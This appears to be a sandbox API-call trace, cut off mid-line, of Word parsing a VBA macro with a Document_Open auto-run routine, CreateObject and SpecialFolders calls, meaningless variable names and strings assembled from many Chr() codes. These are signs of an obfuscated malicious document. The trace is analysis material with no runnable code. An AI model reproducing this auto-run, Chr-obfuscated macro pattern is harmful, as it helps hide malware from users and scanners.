[0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ç", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="è", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="é", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ê", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ë", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ì", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="í", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="î", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ï", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ð", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ñ", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ò", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ó", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ô", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="õ", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ö", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="÷", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ø", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ù", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ú", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="û", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ü", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ý", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="þ", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ÿ", cchSrc=1, lpCharType=0x33e4fb3ff0 | out: lpCharType=0x33e4fb3ff0) returned 1 [0058.960] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Attribute") returned 0x50ed01 [0058.960] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Name") returned 0x50e2ff [0058.961] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xd) returned 0x1d39d86e8a0 [0058.961] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x1a) returned 0x1d3982143e0 [0058.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39d86e8a0, cbMultiByte=13, lpWideCharStr=0x1d3982143e0, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0058.961] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d86e8a0) [0058.961] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3982143e0) [0058.961] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Attribute") returned 0x50ed01 [0058.961] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Base") returned 0x509fb8 [0058.961] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x15) returned 0x1d39d86e9c0 [0058.961] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x2a) returned 0x1d39d44c8a0 [0058.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39d86e9c0, cbMultiByte=21, lpWideCharStr=0x1d39d44c8a0, cchWideChar=21 | out: lpWideCharStr="1Normal.ThisDocument") returned 21 [0058.961] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x2a) returned 0x1d39d44ce60 [0058.962] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a82a0, cb=0x20) returned 0x1d398214620 [0058.962] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a8390, cb=0x28) returned 0x1d398214d70 [0058.962] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d86e9c0) [0058.962] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d44c8a0) [0058.962] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Attribute") returned 0x50ed01 [0058.962] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_GlobalNameSpace") returned 0x50ce77 [0058.962] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="False") returned 0x502d01 [0058.962] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Attribute") returned 0x50ed01 [0058.962] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Creatable") returned 0x501d92 [0058.962] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="False") returned 0x502d01 [0058.963] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Attribute") returned 0x50ed01 [0058.963] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_PredeclaredId") returned 0x505fc7 [0058.963] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="True") returned 0x50f0f4 [0058.963] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Attribute") returned 0x50ed01 [0058.963] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Exposed") returned 0x5030b3 [0058.963] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="True") returned 0x50f0f4 [0058.963] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Attribute") returned 0x50ed01 [0058.963] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_TemplateDerived") returned 0x509f1e [0058.963] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="True") returned 0x50f0f4 [0058.963] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Attribute") returned 0x50ed01 [0058.963] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="VB_Customizable") returned 0x50c26d [0058.963] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="True") returned 0x50f0f4 [0058.964] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Private") returned 0x5073c3 [0058.964] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Sub") returned 0x50d5ac [0058.964] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document_Open") returned 0x5089c1 [0058.964] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x30) returned 0x1d39d44c5e0 [0058.964] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3230000 [0058.967] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dim") returned 0x5083c4 [0058.967] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="euelis") returned 0x506a1d [0058.967] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="As") returned 0x505c8d [0058.967] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Object") returned 0x502ec1 [0058.967] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dim") returned 0x5083c4 [0058.967] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="itelro") returned 0x503431 [0058.967] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="As") returned 0x505c8d [0058.967] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="String") returned 0x50102a [0058.967] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d83d1b0, cb=0x100) returned 0x1d39d94b3e0 [0058.967] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Set") returned 0x50d36e [0058.968] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="euelis") returned 0x506a1d [0058.968] strcpy_s (in: _Dst=0x7ffce0c05050, _DstSize=0x100, _Src="euelis" | out: _Dst="euelis") returned 0x0 [0058.968] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CreateObject") returned 0x508af8 [0058.968] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x30) returned 0x1d39d44c920 [0058.968] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3240000 [0058.968] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="itelro") returned 0x503431 [0058.968] strcpy_s (in: _Dst=0x7ffce0c055b0, _DstSize=0x100, _Src="itelro" | out: _Dst="itelro") returned 0x0 [0058.968] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="euelis") returned 0x506a1d [0058.968] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="SpecialFolders") returned 0x508108 [0058.969] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dim") returned 0x5083c4 [0058.969] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="bbb") returned 0x507804 [0058.969] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dim") returned 0x5083c4 [0058.969] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ccc") returned 0x507d83 [0058.969] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dim") returned 0x5083c4 [0058.969] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ddd") returned 0x508302 [0058.969] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dim") returned 0x5083c4 [0058.969] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="eee") returned 0x508881 [0058.969] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dim") returned 0x5083c4 [0058.969] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="fff") returned 0x508e00 [0058.969] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dim") returned 0x5083c4 [0058.969] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ggg") returned 0x50937f [0058.969] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="As") returned 0x505c8d [0058.969] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Integer") returned 0x50b48a [0058.970] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d94b3e0, cb=0x200) returned 0x1d39d98f5d0 [0058.970] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d83cb80, cb=0x100) returned 0x1d39d94ad80 [0058.970] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dim") returned 0x5083c4 [0058.970] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="hhh") returned 0x5098fe [0058.970] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dim") returned 0x5083c4 [0058.970] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="iii") returned 0x509e7d [0058.970] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ggg") returned 0x50937f [0058.970] strcpy_s (in: _Dst=0x7ffce0c055b0, _DstSize=0x100, _Src="ggg" | out: _Dst="ggg") returned 0x0 [0058.970] atoi (_Str="1") returned 1 [0058.970] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ActiveDocument") returned 0x505cd3 [0058.970] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Range") returned 0x500cda [0058.970] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Font") returned 0x501055 [0058.970] CompareStringA (Locale=0x412, dwCmpFlags=0x30001, lpString1=">", cchCount1=-1, lpString2="Font", cchCount2=-1) returned 1 [0058.970] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Color") returned 0x504632 [0058.970] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="wdColorBlack") returned 0x504433 [0058.970] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Set") returned 0x50d36e [0058.970] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="hhh") returned 0x5098fe [0058.970] strcpy_s (in: _Dst=0x7ffce0c05050, _DstSize=0x100, _Src="hhh" | out: _Dst="hhh") returned 0x0 [0058.970] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CreateObject") returned 0x508af8 [0058.971] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Dim") returned 0x5083c4 [0058.971] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="dfefef") returned 0x50a624 [0058.971] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="dfefef") returned 0x50a624 [0058.971] strcpy_s (in: _Dst=0x7ffce0c055b0, _DstSize=0x100, _Src="dfefef" | out: _Dst="dfefef") returned 0x0 [0058.971] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="88395") returned 6 [0058.971] VarI4FromStr (in: strIn="88395", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H429") returned 6 [0058.972] VarI4FromStr (in: strIn="&H429", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.972] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.972] atoi (_Str="6659") returned 6659 [0058.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1A6B") returned 7 [0058.972] VarI4FromStr (in: strIn="&H1A6B", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.972] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.972] atoi (_Str="5652") returned 5652 [0058.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1679") returned 7 [0058.972] VarI4FromStr (in: strIn="&H1679", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.972] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="111348") returned 7 [0058.973] VarI4FromStr (in: strIn="111348", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H407") returned 6 [0058.973] VarI4FromStr (in: strIn="&H407", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.973] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.973] atoi (_Str="2738") returned 2738 [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HB1E") returned 6 [0058.973] VarI4FromStr (in: strIn="&HB1E", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.973] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="136114") returned 7 [0058.973] VarI4FromStr (in: strIn="136114", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HB8F") returned 6 [0058.973] VarI4FromStr (in: strIn="&HB8F", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.973] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="195715") returned 7 [0058.973] VarI4FromStr (in: strIn="195715", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HBC3") returned 6 [0058.974] VarI4FromStr (in: strIn="&HBC3", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.974] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=8 | out: lpWideCharStr="1097488") returned 8 [0058.974] VarI4FromStr (in: strIn="1097488", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H2647") returned 7 [0058.974] VarI4FromStr (in: strIn="&H2647", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.974] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.974] atoi (_Str="2672") returned 2672 [0058.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HAE0") returned 6 [0058.974] VarI4FromStr (in: strIn="&HAE0", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.974] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="175932") returned 7 [0058.974] VarI4FromStr (in: strIn="175932", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H65D") returned 6 [0058.974] VarI4FromStr (in: strIn="&H65D", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.974] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="430710") returned 7 [0058.975] VarI4FromStr (in: strIn="430710", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1006") returned 7 [0058.975] VarI4FromStr (in: strIn="&H1006", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.975] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="705672") returned 7 [0058.975] VarI4FromStr (in: strIn="705672", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1BD8") returned 7 [0058.975] VarI4FromStr (in: strIn="&H1BD8", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.975] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.975] atoi (_Str="6236") returned 6236 [0058.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 